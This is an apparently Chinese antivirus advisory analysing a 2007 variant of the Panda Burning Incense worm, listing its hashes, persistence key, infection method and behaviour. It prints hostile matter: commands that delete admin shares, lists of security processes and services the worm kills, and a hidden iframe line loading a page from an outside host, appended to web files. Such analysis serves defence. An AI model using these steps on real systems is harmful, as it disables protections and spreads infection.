档案编号:CISRT2007017
病毒名称:N/A(Kaspersky)
病毒别名:Worm.Nimaya.ax(瑞星)
病毒大小:68,570 字节
加壳方式:FSG
样本MD5:baf8d7e0ef0992534de880561f237797
样本SHA1:d324cbaf32a64dd5a91979fcae4d7659f49e688b
发现时间:2007.1
更新时间:2007.1.15
关联
病毒:
传播方式:恶意网页、其它
病毒下载,可通过局域网传播
技术分析==========
一个新的熊猫烧香变种,行为和之前的变种类似:
【CISRT2006078】FuckJacks.exe setup.exe 熊猫烧香 尼姆亚 解决方案
【CISRT2006079】FuckJacks.exe变种 spoclsv.exe 解决方案
【CISRT2006081】熊猫烧香变种 spoclsv.exe 解决方案
【CISRT2007003】熊猫烧香变种 修改网页文件spoclsv.exe 解决方案
运行后复制自身到系统目录并运行:
%System%\drivers\nvscv32.exe
创建启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"nvscv32"="%System%\drivers\nvscv32.exe"
使用net share命令关闭管理共享:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
修改注册表使“显示所有文件和文件夹”设置失效:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
尝试关闭
安全软件相关窗口:
天网
防火墙VirusScan
Symantec AntiVirus
System Safety Monitor
System Repair Engineer
Wrapped gift Killer
游戏
木马检测大师
超级巡警
尝试结束
安全软件相关进程以及Viking
病毒进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
SREng.EXE
删除
安全软件相关服务:
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
删除
安全软件相关启动项:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
遍历目录,感染除以下目录外所有目录中的EXE/SCR/PIF/COM文件:
C:\
C:\WINDOWS
C:\WINNT
C:\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
Program Files\Windows NT
Program Files\WindowsUpdate
Program Files\Windows Media Player
Program Files\Outlook Express
Program Files\Internet Explorer
Program Files\NetMeeting
Program Files\Common Files
Program Files\ComPlus Applications
Program Files\Messenger
Program Files\InstallShield Installation Information
Program Files\MSN
Program Files\Microsoft Frontpage
Program Files\Movie Maker
Program Files\MSN Gamin Zone
感染方式同之前的变种,将自身捆绑在被感染文件前端,在尾部添加标记信息:
WhBoy{原文件名}.exe {原文件大小}
但是
病毒会跳过文件名是setup.exe和NTDETECT.COM的文件,不感染它们,并且删除GHO文件。
同样修改除上述目录外其它目录中的htm/html/asp/php/jsp/aspx网页文件,在文件尾部追加隐藏iframe代码:
<iframe src=http://www.krvkr.com/
worm.htm width="0" height="0"></iframe>
病毒所到之处会留下Desktop_.ini文件作为标记,Desktop_.ini内容是当前日期,如:2007-1-15
[1] [2] 下一页
[推荐]熊猫烧香变种 感染文件 修改网页 nvscv32.exe 解决方案
您现在的位置: